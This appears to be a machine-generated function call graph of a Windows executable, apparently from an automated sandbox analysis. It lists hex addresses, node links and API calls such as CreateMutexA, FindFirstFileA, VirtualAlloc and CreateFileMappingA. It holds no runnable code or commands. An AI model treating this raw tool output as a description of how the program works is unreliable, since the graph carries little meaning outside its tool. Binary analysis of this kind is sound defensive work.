efa6e5 HeapFree 8243->8244 8248 efa70e _free 8243->8248 8245 efa6fa 8244->8245 8244->8248 8246 ef9826 _free 18 API calls 8245->8246 8247 efa700 GetLastError 8246->8247 8247->8248 8248->8217 8254 efc6f0 8249->8254 8251 efdc5f _ValidateLocalCookies 5 API calls 8252 efc6ec 8251->8252 8252->8234 8253 efc6c2 8253->8251 8255 efc6fc ___FrameUnwindToState 8254->8255 8260 efaf81 EnterCriticalSection 8255->8260 8257 efc707 8261 efc739 8257->8261 8259 efc72e ___FrameUnwindToState 8259->8253 8260->8257 8262 efafc9 _abort LeaveCriticalSection 8261->8262 8263 efc740 8262->8263 8263->8259 8265 efa744 8264->8265 8269 efa740 8264->8269 8265->8239 8265->8240 8266 efa764 8266->8265 8268 efa770 GetProcAddress 8266->8268 8270 efa780 try_get_function 8268->8270 8269->8265 8269->8266 8271 efa7b0 8269->8271 8270->8265 8272 efa7c6 8271->8272 8273 efa7d1 LoadLibraryExW 8271->8273 8272->8269 8274 efa7ee GetLastError 8273->8274 8275 efa806 8273->8275 8274->8275 8277 efa7f9 LoadLibraryExW 8274->8277 8275->8272 8276 efa81d FreeLibrary 8275->8276 8276->8272 8277->8275 8279 ef9ccd 8278->8279 8280 ef9cd3 8278->8280 8297 efa8d7 8279->8297 8282 efa67d __dosmaperr 17 API calls 8280->8282 8285 ef9d2a SetLastError 8280->8285 8283 ef9ce5 8282->8283 8284 ef9ced 8283->8284 8304 efa92d 8283->8304 8288 efa6da _free 17 API calls 8284->8288 8286 ef982b 8285->8286 8286->8223 8290 ef9cf3 8288->8290 8292 ef9d21 SetLastError 8290->8292 8291 ef9d09 8311 ef9aa2 8291->8311 8292->8286 8295 efa6da _free 17 API calls 8296 ef9d1a 8295->8296 8296->8285 8296->8292 8298 efa714 __dosmaperr 5 API calls 8297->8298 8299 efa8fe 8298->8299 8300 efa916 TlsGetValue 8299->8300 8303 efa90a 8299->8303 8300->8303 8301 efdc5f _ValidateLocalCookies 5 API calls 8302 efa927 8301->8302 8302->8280 8303->8301 8305 efa714 __dosmaperr 5 API calls 8304->8305 8306 efa954 8305->8306 8307 efa96f TlsSetValue 8306->8307 8308 efa963 8306->8308 8307->8308 8309 efdc5f _ValidateLocalCookies 5 API calls 8308->8309 8310 ef9d02 8309->8310 8310->8284 8310->8291 8316 ef9a7a 8311->8316 8322 ef99ba 8316->8322 8318 ef9a9e 8319 ef9a2a 8318->8319 8328 ef98be 8319->8328 8321 ef9a4e 8321->8295 8323 ef99c6 ___FrameUnwindToState 8322->8323 8324 efaf81 _abort EnterCriticalSection 8323->8324 8325 ef99d0 8324->8325 8326 ef99f6 __dosmaperr LeaveCriticalSection 8325->8326 8327 ef99ee ___FrameUnwindToState 8326->8327 8327->8318 8329 ef98ca ___FrameUnwindToState 8328->8329 8330 efaf81 _abort EnterCriticalSection 8329->8330 8331 ef98d4 8330->8331 8332 ef9be5 __dosmaperr 20 API calls 8331->8332 8333 ef98ec 8332->8333 8334 ef9902 __dosmaperr LeaveCriticalSection 8333->8334 8335 ef98fa ___FrameUnwindToState 8334->8335 8335->8321 8337 ef9cb4 __dosmaperr 20 API calls 8336->8337 8338 ef9705 8337->8338 8339 ef9764 8338->8339 8340 ef9713 8338->8340 8347 ef977a IsProcessorFeaturePresent 8339->8347 8344 efdc5f _ValidateLocalCookies 5 API calls 8340->8344 8342 ef9769 8343 ef96ef pre_c_initialization 26 API calls 8342->8343 8345 ef9776 8343->8345 8346 ef973a 8344->8346 8345->8225 8346->8225 8348 ef9785 8347->8348 8351 ef95a0 8348->8351 8352 ef95bc _abort ___scrt_fastfail 8351->8352 8353 ef95e8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8352->8353 8356 ef96b9 _abort 8353->8356 8354 efdc5f _ValidateLocalCookies 5 API calls 8355 ef96d7 GetCurrentProcess TerminateProcess 8354->8355 8355->8342 8356->8354 8357->8228 8358->8211 8359->8183 8361 f0079e 8360->8361 8363 f007c4 8360->8363 8362 f007ae FreeLibrary 8361->8362 8361->8363 8362->8361 8363->8103 8365 efdebd GetStartupInfoW 8364->8365 8365->8048 8367 ef3ee8 8366->8367 8379 ef40d5 8366->8379 8368 ef40ec 8367->8368 8369 ef3ef9 8367->8369 8372 ef414e CreateFileMappingA 8368->8372 8368->8379 8410 ef3450 8369->8410 8373 ef4135 8372->8373 8373->8368 8374 f08570 2 API calls 8375 ef4007 8374->8375 8416 ef47e0 8375->8416 8379->8068 8381 f05cbb 8380->8381 8383 f05631 8380->8383 8382 f05d0e ReadFile 8381->8382 8381->8383 8382->8383 8383->8059 8385 f077a4 8384->8385 8389 ef2336 8384->8389 8386 f07819 8385->8386 8385->8389 8442 ef2800 8386->8442 8388 f078bf 8388->8389 8389->8069 8389->8070 8391 ef396b 8390->8391 8392 ef36fa 8390->8392 8393 ef2800 4 API calls 8391->8393 8394 ef2800 4 API calls 8392->8394 8395 ef3a1a CreateMutexA GetModuleHandleA 8393->8395 8396 ef374f 8394->8396 8397 f05ea0 FindFirstFileA 8395->8397 8448 ef1000 8396->8448 8401 ef3841 8397->8401 8400 ef2590 2 API calls 8400->8401 8401->8060 8403 f085e5 8402->8403 8404 f08747 CreateFileA 8402->8404 8406 f05ea0 FindFirstFileA 8403->8406 8405 f0883c 8404->8405 8405->8068 8407 f08642 8406->8407 8407->8405 8409 f062e3 8408->8409 8409->8062 8411 ef34a4 8410->8411 8414 ef35fc 8410->8414 8412 ef354e 8411->8412 8424 ef3d10 8411->8424 8412->8414 8415 ef363a GetModuleFileNameA 8412->8415 8414->8374 8415->8414 8417 ef406c 8416->8417 8418 ef4849 8416->8418 8420 ef14c0 8417->8420 8418->8417 8419 ef4889 VirtualAlloc 8418->8419 8419->8417 8422 ef153d 8420->8422 8421 ef1588 8421->8379 8422->8421 8434 f08850 8422->8434 8425 ef3d80 8424->8425 8426 ef3d72 8424->8426 8425->8412 8426->8425 8428 ef2590 8426->8428 8429 ef2606 8428->8429 8432 ef2627 8428->8432 8429->8432 8433 ef274b GetCommandLineA 8429->8433 8430 ef2763 8430->8426 8431 ef27c2 GetCurrentActCtx 8431->8430 8432->8430 8432->8431 8433->8429 8435 f088ba 8434->8435 8436 f08a81 8434->8436 8435->8422 8436->8435 8438 f05ea0 8436->8438 8439 f05ef4 8438->8439 8440 f05f4c 8439->8440 8441 f05fa8 FindFirstFileA 8439->8441 8440->8435 8441->8439 8443 ef2861 8442->8443 8445 ef2b35 8442->8445 8444 f08850 FindFirstFileA 8443->8444 8446 ef2b12 8444->8446 8445->8446 8447 ef2b67 GetCurrentActCtx CreateFileA WideCharToMultiByte 8445->8447 8446->8388 8447->8388 8449 ef106a 8448->8449 8456 ef122f 8448->8456 8450 ef107c 8449->8450 8451 ef1286 8449->8451 8457 f08330 8450->8457 8453 ef12c7 WideCharToMultiByte CreateFileMappingA CreateMutexA 8451->8453 8451->8456 8453->8456 8456->8400 8458 f0838d 8457->8458 8463 ef110b 8457->8463 8459 f0839f 8458->8459 8460 f08489 8458->8460 8470 ef3c20 8459->8470 8462 f084cc SetHandleInformation 8460->8462 8460->8463 8462->8460 8464 ef3250 8463->8464 8465 ef32bb 8464->8465 8468 ef32c8 8464->8468 8467 ef32ea CloseHandle 8465->8467 8465->8468 8466 ef331a 8466->8456 8467->8468 8468->8466 8469 ef33f5 FindNextFileA 8468->8469 8469->8468 8471 ef3c97 ReleaseMutex 8470->8471 8472 ef3c77 8470->8472 8471->8472 8472->8463 8474 ef9c46 8473->8474 8475 ef9c4c 8473->8475 8477 efa8d7 __dosmaperr 11 API calls 8474->8477 8476 efa67d __dosmaperr 20 API calls 8475->8476 8479 ef9c9b SetLastError 8475->8479 8478 ef9c5e 8476->8478 8477->8475 8480 ef9c66 8478->8480 8481 efa92d __dosmaperr 11 API calls 8478->8481 8479->8081 8482 efa6da _free 20 API calls 8480->8482 8483 ef9c7b 8481->8483 8484 ef9c6c 8482->8484 8483->8480 8485 ef9c82 8483->8485 8486 ef9ca7 SetLastError 8484->8486 8487 ef9aa2 __dosmaperr 20 API calls 8485->8487 8488 efa63a _abort 44 API calls 8486->8488 8489 ef9c8d 8487->8489 8490 ef9cb3 8488->8490 8491 efa6da _free 20 API calls 8489->8491 8492 ef9c94 8491->8492 8492->8479 8492->8486 8502 efc435 8493->8502 8496 efa654 IsProcessorFeaturePresent 8499 efa63f 8496->8499 8498 ef95a0 _abort 8 API calls 8498->8499 8499->8493 8499->8496 8499->8498 8501 efd79d 8499->8501 8505 efc490 8499->8505 8532 efc2e5 8499->8532 8535 eff424 8499->8535 8551 efc3a3 8502->8551 8506 efc49c _abort 8505->8506 8507 ef9cb4 __dosmaperr 20 API calls 8506->8507 8511 efc4c9 _abort 8506->8511 8512 efc4c3 _abort 8506->8512 8507->8512 8508 efc515 8509 ef9826 _free 20 API calls 8508->8509 8510 efc51a 8509->8510 8513 ef976a pre_c_initialization 26 API calls 8510->8513 8517 efc541 8511->8517 8565 efaf81 EnterCriticalSection 8511->8565 8512->8508 8512->8511 8531 efc4f8 8512->8531 8513->8531 8518 efc5a0 8517->8518 8520 efc598 8517->8520 8528 efc5cb 8517->8528 8566 efafc9 LeaveCriticalSection 8517->8566 8518->8528 8567 efc487 8518->8567 8523 efc2e5 _abort 28 API calls 8520->8523 8523->8518 8525 ef9c30 pre_c_initialization 47 API calls 8529 efc62e 8525->8529 8527 efc487 _abort 47 API calls 8527->8528 8570 efc650 8528->8570 8530 ef9c30 pre_c_initialization 47 API calls 8529->8530 8529->8531 8530->8531 8574 efe2e9 8531->8574 8578 efc0b0 8532->8578 8536 eff42d 8535->8536 8537 eff430 GetLastError 8535->8537 8536->8499 8653 f0069e 8537->8653 8539 eff445 8540 eff4aa SetLastError 8539->8540 8541 f006d8 ___vcrt_FlsSetValue 6 API calls 8539->8541 8550 eff464 8539->8550 8540->8499 8542 eff45e 8541->8542 8543 efa67d __dosmaperr 20 API calls 8542->8543 8542->8550 8544 eff472 8543->8544 8545 eff486 8544->8545 8546 f006d8 ___vcrt_FlsSetValue 6 API calls 8544->8546 8547 f006d8 ___vcrt_FlsSetValue 6 API calls 8545->8547 8548 eff49a 8545->8548 8546->8545 8547->8548 8549 efa6da _free 20 API calls 8548->8549 8549->8550 8550->8540 8554 efc349 8551->8554 8553 efc3c7 8553->8499 8555 efc355 ___FrameUnwindToState 8554->8555 8560 efaf81 EnterCriticalSection 8555->8560 8557 efc363 8561 efc397 8557->8561 8559 efc38a ___FrameUnwindToState 8559->8553 8560->8557 8564 efafc9 LeaveCriticalSection 8561->8564 8563 efc3a1 8563->8559 8564->8563 8565->8517 8566->8520 8568 ef9c30 pre_c_initialization 47 API calls 8567->8568 8569 efc48c 8568->8569 8569->8527 8571 efc61f 8570->8571 8572 efc656 8570->8572 8571->8525 8571->8529 8571->8531 8577 efafc9 LeaveCriticalSection 8572->8577 8575 efdc5f _ValidateLocalCookies 5 API calls 8574->8575 8576 efe2f4 8575->8576 8576->8576 8577->8571 8579 efc0bc _abort 8578->8579 8587 efc0d4 8579->8587 8600 efc20a GetModuleHandleW 8579->8600 8583 efc0dc 8591 efc151 8583->8591 8599 efc17a 8583->8599 8610 efd6e4 8583->8610 8609 efaf81 EnterCriticalSection 8587->8609 8588 efc197 8616 efc1c9 8588->8616 8589 efc1c3 8594 efe2e9 _abort 5 API calls 8589->8594 8590 efc169 8596 efd2da _abort 5 API calls 8590->8596 8591->8590 8595 efd2da _abort 5 API calls 8591->8595 8598 efc1c8 8594->8598 8595->8590 8596->8599 8598->8499 8613 efc1ba 8599->8613 8601 efc0c8 8600->8601 8601->8587 8602 efc24e GetModuleHandleExW 8601->8602 8603 efc278 GetProcAddress 8602->8603 8604 efc28d 8602->8604 8603->8604 8605 efc2aa 8604->8605 8606 efc2a1 FreeLibrary 8604->8606 8607 efdc5f _ValidateLocalCookies 5 API calls 8605->8607 8606->8605 8608 efc2b4 8607->8608 8608->8587 8609->8583 8624 efd41d 8610->8624 8646 efafc9 LeaveCriticalSection 8613->8646 8615 efc193 8615->8588 8615->8589 8647 efaaf2 8616->8647 8619 efc1f7 8622 efc24e _abort 8 API calls 8619->8622 8620 efc1d7 GetPEB 8620->8619 8621 efc1e7 GetCurrentProcess TerminateProcess 8620->8621 8621->8619 8623 efc1ff ExitProcess 8622->8623 8627 efd3cc 8624->8627 8626 efd441 8626->8591 8628 efd3d8 ___FrameUnwindToState 8627->8628 8635 efaf81 EnterCriticalSection 8628->8635 8630 efd3e6 8636 efd46d 8630->8636 8634 efd404 ___FrameUnwindToState 8634->8626 8635->8630 8639 efd48d 8636->8639 8640 efd495 8636->8640 8637 efdc5f _ValidateLocalCookies 5 API calls 8638 efd3f3 8637->8638 8642 efd411 8638->8642 8639->8637 8640->8639 8641 efa6da _free 20 API calls 8640->8641 8641->8639 8645 efafc9 LeaveCriticalSection 8642->8645 8644 efd41b 8644->8634 8645->8644 8646->8615 8648 efab17 8647->8648 8652 efab0d 8647->8652 8649 efa714 __dosmaperr 5 API calls 8648->8649 8649->8652 8650 efdc5f _ValidateLocalCookies 5 API calls 8651 efab75 8650->8651 8651->8619 8651->8620 8652->8650 8654 f00509 try_get_function 5 API calls 8653->8654 8655 f006b8 8654->8655 8656 f006cf TlsGetValue 8655->8656 8657 f006c4 8655->8657 8656->8657 8657->8539 9112 f028f8 9122 f02f33 9112->9122 9116 f02905 9135 f030b4 9116->9135 9119 f0292f 9120 efa6da _free 20 API calls 9119->9120 9121 f0293a 9120->9121 9139 f02f3c 9122->9139 9124 f02900 9125 f03014 9124->9125 9126 f03020 ___FrameUnwindToState 9125->9126 9159 efaf81 EnterCriticalSection 9126->9159 9128 f03096 9173 f030ab 9128->9173 9130 f0302b 9130->9128 9132 f0306a DeleteCriticalSection 9130->9132 9160 f03e2c 9130->9160 9131 f030a2 ___FrameUnwindToState 9131->9116 9133 efa6da _free 20 API calls 9132->9133 9133->9130 9136 f030ca 9135->9136 9137 f02914 DeleteCriticalSection 9135->9137 9136->9137 9138 efa6da _free 20 API calls 9136->9138 9137->9116 9137->9119 9138->9137 9140 f02f48 ___FrameUnwindToState 9139->9140 9149 efaf81 EnterCriticalSection 9140->9149 9142 f02feb 9154 f0300b 9142->9154 9146 f02ff7 ___FrameUnwindToState 9146->9124 9147 f02eec 75 API calls 9148 f02f57 9147->9148 9148->9142 9148->9147 9150 f02944 EnterCriticalSection 9148->9150 9151 f02fe1 9148->9151 9149->9148 9150->9148 9157 f02958 LeaveCriticalSection 9151->9157 9153 f02fe9 9153->9148 9158 efafc9 LeaveCriticalSection 9154->9158 9156 f03012 9156->9146 9157->9153 9158->9156 9159->9130 9161 f03e38 ___FrameUnwindToState 9160->9161 9162 f03e49 9161->9162 9163 f03e5e 9161->9163 9164 ef9826 _free 20 API calls 9162->9164 9172 f03e59 ___FrameUnwindToState 9163->9172 9176 f02944 EnterCriticalSection 9163->9176 9165 f03e4e 9164->9165 9167 ef976a pre_c_initialization 26 API calls 9165->9167 9167->9172 9168 f03e7a 9177 f03db6 9168->9177 9170 f03e85 9193 f03ea2 9170->9193 9172->9130 9441 efafc9 LeaveCriticalSection 9173->9441 9175 f030b2 9175->9131 9176->9168 9178 f03dc3 9177->9178 9179 f03dd8 9177->9179 9180 ef9826 _free 20 API calls 9178->9180 9184 f03dd3 9179->9184 9196 f02e86 9179->9196 9181 f03dc8 9180->9181 9183 ef976a pre_c_initialization 26 API calls 9181->9183 9183->9184 9184->9170 9186 f030b4 20 API calls 9187 f03df4 9186->9187 9202 f0280a 9187->9202 9189 f03dfa 9209 f042ca 9189->9209 9192 efa6da _free 20 API calls 9192->9184 9440 f02958 LeaveCriticalSection 9193->9440 9195 f03eaa 9195->9172 9197 f02e9e 9196->9197 9198 f02e9a 9196->9198 9197->9198 9199 f0280a 26 API calls 9197->9199 9198->9186 9200 f02ebe 9199->9200 9224 f037b1 9200->9224 9203 f02816 9202->9203 9204 f0282b 9202->9204 9205 ef9826 _free 20 API calls 9203->9205 9204->9189 9206 f0281b 9205->9206 9207 ef976a pre_c_initialization 26 API calls 9206->9207 9208 f02826 9207->9208 9208->9189 9210 f042d9 9209->9210 9211 f042ee 9209->9211 9212 ef9813 __dosmaperr 20 API calls 9210->9212 9213 f04329 9211->9213 9218 f04315 9211->9218 9214 f042de 9212->9214 9215 ef9813 __dosmaperr 20 API calls 9213->9215 9217 ef9826 _free 20 API calls 9214->9217 9216 f0432e 9215->9216 9219 ef9826 _free 20 API calls 9216->9219 9222 f03e00 9217->9222 9397 f042a2 9218->9397 9221 f04336 9219->9221 9223 ef976a pre_c_initialization 26 API calls 9221->9223 9222->9184 9222->9192 9223->9222 9225 f037bd ___FrameUnwindToState 9224->9225 9226 f037c5 9225->9226 9227 f037dd 9225->9227 9249 ef9813 9226->9249 9228 f0387b 9227->9228 9232 f03812 9227->9232 9230 ef9813 __dosmaperr 20 API calls 9228->9230 9233 f03880 9230->9233 9252 f01eb0 EnterCriticalSection 9232->9252 9236 ef9826 _free 20 API calls 9233->9236 9234 ef9826 _free 20 API calls 9242 f037d2 ___FrameUnwindToState 9234->9242 9238 f03888 9236->9238 9237 f03818 9239 f03834 9237->9239 9240 f03849 9237->9240 9241 ef976a pre_c_initialization 26 API calls 9238->9241 9243 ef9826 _free 20 API calls 9239->9243 9253 f0389c 9240->9253 9241->9242 9242->9198 9245 f03839 9243->9245 9247 ef9813 __dosmaperr 20 API calls 9245->9247 9246 f03844 9304 f03873 9246->9304 9247->9246 9250 ef9cb4 __dosmaperr 20 API calls 9249->9250 9251 ef9818 9250->9251 9251->9234 9252->9237 9254 f038c3 9253->9254 9255 f038ca 9253->9255 9259 efdc5f _ValidateLocalCookies 5 API calls 9254->9259 9256 f038ed 9255->9256 9257 f038ce 9255->9257 9261 f0393e 9256->9261 9262 f03921 9256->9262 9258 ef9813 __dosmaperr 20 API calls 9257->9258 9260 f038d3 9258->9260 9263 f03aa4 9259->9263 9264 ef9826 _free 20 API calls 9260->9264 9265 f03954 9261->9265 9307 f03d9b 9261->9307 9266 ef9813 __dosmaperr 20 API calls 9262->9266 9263->9246 9267 f038da 9264->9267 9310 f03441 9265->9310 9270 f03926 9266->9270 9271 ef976a pre_c_initialization 26 API calls 9267->9271 9273 ef9826 _free 20 API calls 9270->9273 9271->9254 9276 f0392e 9273->9276 9274 f03962 9279 f03966 9274->9279 9280 f03988 9274->9280 9275 f0399b 9277 f039f5 WriteFile 9275->9277 9278 f039af 9275->9278 9281 ef976a pre_c_initialization 26 API calls 9276->9281 9285 f03a18 GetLastError 9277->9285 9287 f0397e 9277->9287 9282 f039e5 9278->9282 9283 f039b7 9278->9283 9284 f03a5c 9279->9284 9317 f033d4 9279->9317 9322 f03221 GetConsoleCP 9280->9322 9281->9254 9348 f034b7 9282->9348 9288 f039d5 9283->9288 9289 f039bc 9283->9289 9284->9254 9292 ef9826 _free 20 API calls 9284->9292 9285->9287 9287->9254 9287->9284 9295 f03a38 9287->9295 9340 f03684 9288->9340 9289->9284 9333 f03596 9289->9333 9294 f03a81 9292->9294 9297 ef9813 __dosmaperr 20 API calls 9294->9297 9298 f03a53 9295->9298 9299 f03a3f 9295->9299 9297->9254 9355 ef97f0 9298->9355 9300 ef9826 _free 20 API calls 9299->9300 9302 f03a44 9300->9302 9303 ef9813 __dosmaperr 20 API calls 9302->9303 9303->9254 9396 f01ed3 LeaveCriticalSection 9304->9396 9306 f03879 9306->9242 9360 f03d1d 9307->9360 9382 f02e30 9310->9382 9312 f03451 9313 ef9c30 pre_c_initialization 47 API calls 9312->9313 9314 f03456 9312->9314 9315 f03479 9313->9315 9314->9274 9314->9275 9315->9314 9316 f03497 GetConsoleMode 9315->9316 9316->9314 9318 f0342e 9317->9318 9321 f033f9 9317->9321 9318->9287 9319 f03f11 WriteConsoleW CreateFileW 9319->9321 9320 f03430 GetLastError 9320->9318 9321->9318 9321->9319 9321->9320 9323 f03396 9322->9323 9327 f03284 9322->9327 9324 efdc5f _ValidateLocalCookies 5 API calls 9323->9324 9325 f033d0 9324->9325 9325->9287 9327->9323 9328 f0330a WideCharToMultiByte 9327->9328 9329 f027f0 49 API calls __fassign 9327->9329 9332 f03361 WriteFile 9327->9332 9391 ef9839 9327->9391 9328->9323 9330 f03330 WriteFile 9328->9330 9329->9327 9330->9327 9331 f033b9 GetLastError 9330->9331 9331->9323 9332->9327 9332->9331 9338 f035a5 9333->9338 9334 f03667 9335 efdc5f _ValidateLocalCookies 5 API calls 9334->9335 9339 f03680 9335->9339 9336 f03623 WriteFile 9337 f03669 GetLastError 9336->9337 9336->9338 9337->9334 9338->9334 9338->9336 9339->9287 9347 f03693 9340->9347 9341 f0379e 9342 efdc5f _ValidateLocalCookies 5 API calls 9341->9342 9343 f037ad 9342->9343 9343->9287 9344 f03715 WideCharToMultiByte 9345 f03796 GetLastError 9344->9345 9346 f0374a WriteFile 9344->9346 9345->9341 9346->9345 9346->9347 9347->9341 9347->9344 9347->9346 9351 f034c6 9348->9351 9349 f03579 9352 efdc5f _ValidateLocalCookies 5 API calls 9349->9352 9350 f03538 WriteFile 9350->9351 9354 f0357b GetLastError 9350->9354 9351->9349 9351->9350 9353 f03592 9352->9353 9353->9287 9354->9349 9356 ef9813 __dosmaperr 20 API calls 9355->9356 9357 ef97fb _free 9356->9357 9358 ef9826 _free 20 API calls 9357->9358 9359 ef980e 9358->9359 9359->9254 9369 f01f87 9360->9369 9362 f03d2f 9363 f03d37 9362->9363 9364 f03d48 SetFilePointerEx 9362->9364 9367 ef9826 _free 20 API calls 9363->9367 9365 f03d60 GetLastError 9364->9365 9366 f03d3c 9364->9366 9368 ef97f0 __dosmaperr 20 API calls 9365->9368 9366->9265 9367->9366 9368->9366 9370 f01f94 9369->9370 9373 f01fa9 9369->9373 9371 ef9813 __dosmaperr 20 API calls 9370->9371 9372 f01f99 9371->9372 9375 ef9826 _free 20 API calls 9372->9375 9374 ef9813 __dosmaperr 20 API calls 9373->9374 9376 f01fce 9373->9376 9377 f01fd9 9374->9377 9378 f01fa1 9375->9378 9376->9362 9379 ef9826 _free 20 API calls 9377->9379 9378->9362 9380 f01fe1 9379->9380 9381 ef976a pre_c_initialization 26 API calls 9380->9381 9381->9378 9383 f02e4a 9382->9383 9384 f02e3d 9382->9384 9386 f02e56 9383->9386 9387 ef9826 _free 20 API calls 9383->9387 9385 ef9826 _free 20 API calls 9384->9385 9388 f02e42 9385->9388 9386->9312 9389 f02e77 9387->9389 9388->9312 9390 ef976a pre_c_initialization 26 API calls 9389->9390 9390->9388 9392 ef9c30 pre_c_initialization 47 API calls 9391->9392 9393 ef9844 9392->9393 9394 ef9d7f __fassign 47 API calls 9393->9394 9395 ef9854 9394->9395 9395->9327 9396->9306 9400 f04220 9397->9400 9399 f042c6 9399->9222 9401 f0422c ___FrameUnwindToState 9400->9401 9411 f01eb0 EnterCriticalSection 9401->9411 9403 f0423a 9404 f04261 9403->9404 9405 f0426c 9403->9405 9412 f04349 9404->9412 9406 ef9826 _free 20 API calls 9405->9406 9408 f04267 9406->9408 9427 f04296 9408->9427 9410 f04289 ___FrameUnwindToState 9410->9399 9411->9403 9413 f01f87 26 API calls 9412->9413 9416 f04359 9413->9416 9414 f0435f 9430 f01ef6 9414->9430 9416->9414 9419 f01f87 26 API calls 9416->9419 9426 f04391 9416->9426 9417 f01f87 26 API calls 9420 f0439d CloseHandle 9417->9420 9421 f04388 9419->9421 9420->9414 9422 f043a9 GetLastError 9420->9422 9425 f01f87 26 API calls 9421->9425 9422->9414 9423 ef97f0 __dosmaperr 20 API calls 9424 f043d9 9423->9424 9424->9408 9425->9426 9426->9414 9426->9417 9439 f01ed3 LeaveCriticalSection 9427->9439 9429 f042a0 9429->9410 9431 f01f6c 9430->9431 9433 f01f05 9430->9433 9432 ef9826 _free 20 API calls 9431->9432 9434 f01f71 9432->9434 9433->9431 9438 f01f2f 9433->9438 9435 ef9813 __dosmaperr 20 API calls 9434->9435 9436 f01f5c 9435->9436 9436->9423 9436->9424 9437 f01f56 SetStdHandle 9437->9436 9438->9436 9438->9437 9439->9429 9440->9195 9441->9175 9848 efc87a 9851 efb4ba 9848->9851 9852 efb4cc 9851->9852 9853 efb4c3 9851->9853 9853->9852 9854 efb3b9 61 API calls 9853->9854 9854->9852 8998 f012db 9007 f01d19 GetEnvironmentStringsW 8998->9007 9001 f012f3 9003 efa6da _free 20 API calls 9001->9003 9004 f01328 9003->9004 9005 efa6da _free 20 API calls 9005->9001 9006 f012fe 9006->9005 9008 f012ed 9007->9008 9009 f01d2d 9007->9009 9008->9001 9014 f0132e 9008->9014 9010 efbd19 __onexit 21 API calls 9009->9010 9011 f01d41 9010->9011 9012 efa6da _free 20 API calls 9011->9012 9013 f01d5b FreeEnvironmentStringsW 9012->9013 9013->9008 9016 f0134c 9014->9016 9015 efa67d __dosmaperr 20 API calls 9021 f01386 9015->9021 9016->9015 9017 f013f7 9018 efa6da _free 20 API calls 9017->9018 9019 f01411 9018->9019 9019->9006 9020 efa67d __dosmaperr 20 API calls 9020->9021 9021->9017 9021->9020 9022 f013f9 9021->9022 9026 f0141b 9021->9026 9029 efa6da _free 20 API calls 9021->9029 9031 efbd67 9021->9031 9040 f01428 9022->9040 9028 ef977a pre_c_initialization 11 API calls 9026->9028 9027 efa6da _free 20 API calls 9027->9017 9030 f01427 9028->9030 9029->9021 9032 efbd82 9031->9032 9033 efbd74 9031->9033 9034 ef9826 _free 20 API calls 9032->9034 9033->9032 9036 efbd9b 9033->9036 9035 efbd8c 9034->9035 9037 ef976a pre_c_initialization 26 API calls 9035->9037 9038 efbd96 9036->9038 9039 ef9826 _free 20 API calls 9036->9039 9037->9038 9038->9021 9039->9035 9041 f01435 9040->9041 9045 f013ff 9040->9045 9042 f0144c 9041->9042 9043 efa6da _free 20 API calls 9041->9043 9044 efa6da _free 20 API calls 9042->9044 9043->9041 9044->9045 9045->9027 8658 efdadb 8663 efdedd SetUnhandledExceptionFilter 8658->8663 8660 efdae0 pre_c_initialization 8664 efc748 8660->8664 8662 efdaeb 8663->8660 8665 efc76e 8664->8665 8666 efc754 8664->8666 8665->8662 8666->8665 8667 ef9826 _free 20 API calls 8666->8667 8668 efc75e 8667->8668 8669 ef976a pre_c_initialization 26 API calls 8668->8669 8670 efc769 8669->8670 8670->8662 10155 efda2f 10156 efda37 pre_c_initialization 10155->10156 10173 f0154f 10156->10173 10158 efda42 pre_c_initialization 10180 efe3ac 10158->10180 10160 efdacb 10161 efdd8f ___scrt_fastfail 4 API calls 10160->10161 10163 efdad2 ___scrt_initialize_default_local_stdio_options 10161->10163 10162 efda57 __RTC_Initialize 10162->10160 10185 efe54d 10162->10185 10165 efda70 pre_c_initialization 10165->10160 10166 efda81 10165->10166 10188 efe60b InitializeSListHead 10166->10188 10168 efda86 pre_c_initialization 10189 efe617 10168->10189 10170 efdaa9 pre_c_initialization 10195 ef9e41 10170->10195 10172 efdab4 pre_c_initialization 10174 f01581 10173->10174 10175 f0155e 10173->10175 10174->10158 10175->10174 10176 ef9826 _free 20 API calls 10175->10176 10177 f01571 10176->10177 10178 ef976a pre_c_initialization 26 API calls 10177->10178 10179 f0157c 10178->10179 10179->10158 10181 efe3bf ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 10180->10181 10182 efe3ba 10180->10182 10181->10162 10182->10181 10183 efdd8f ___scrt_fastfail 4 API calls 10182->10183 10184 efe442 10183->10184 10202 efe512 10185->10202 10188->10168 10268 f016db 10189->10268 10191 efe628 10192 efe62f 10191->10192 10193 efdd8f ___scrt_fastfail 4 API calls 10191->10193 10192->10170 10194 efe637 10193->10194 10196 ef9c30 pre_c_initialization 47 API calls 10195->10196 10197 ef9e4c 10196->10197 10198 ef9826 _free 20 API calls 10197->10198 10201 ef9e84 10197->10201 10199 ef9e79 10198->10199 10200 ef976a pre_c_initialization 26 API calls 10199->10200 10200->10201 10201->10172 10203 efe52f 10202->10203 10204 efe536 10202->10204 10208 efd6ce 10203->10208 10211 efd73e 10204->10211 10207 efe534 10207->10165 10209 efd73e __onexit 29 API calls 10208->10209 10210 efd6e0 10209->10210 10210->10207 10214 efd445 10211->10214 10217 efd37b 10214->10217 10216 efd469 10216->10207 10218 efd387 ___FrameUnwindToState 10217->10218 10225 efaf81 EnterCriticalSection 10218->10225 10220 efd395 10226 efd58d 10220->10226 10222 efd3a2 10236 efd3c0 10222->10236 10224 efd3b3 ___FrameUnwindToState 10224->10216 10225->10220 10227 efd5ab 10226->10227 10228 efd5a3 try_get_function 10226->10228 10227->10228 10229 efd604 10227->10229 10239 efd91b 10227->10239 10228->10222 10229->10228 10231 efd91b __onexit 29 API calls 10229->10231 10233 efd61a 10231->10233 10232 efd5fa 10234 efa6da _free 20 API calls 10232->10234 10235 efa6da _free 20 API calls 10233->10235 10234->10229 10235->10228 10267 efafc9 LeaveCriticalSection 10236->10267 10238 efd3ca 10238->10224 10240 efd926 10239->10240 10241 efd94e 10240->10241 10242 efd93f 10240->10242 10243 efd95d 10241->10243 10248 efd993 10241->10248 10244 ef9826 _free 20 API calls 10242->10244 10255 efd9c6 10243->10255 10247 efd944 ___scrt_fastfail 10244->10247 10247->10232 10249 efd99e 10248->10249 10250 efd9b3 HeapSize 10248->10250 10251 ef9826 _free 20 API calls 10249->10251 10250->10243 10252 efd9a3 10251->10252 10253 ef976a pre_c_initialization 26 API calls 10252->10253 10254 efd9ae 10253->10254 10254->10243 10256 efd9de 10255->10256 10257 efd9d3 10255->10257 10258 efd9e6 10256->10258 10265 efd9ef __dosmaperr 10256->10265 10259 efbd19 __onexit 21 API calls 10257->10259 10260 efa6da _free 20 API calls 10258->10260 10263 efd9db 10259->10263 10260->10263 10261 efda19 HeapReAlloc 10261->10263 10261->10265 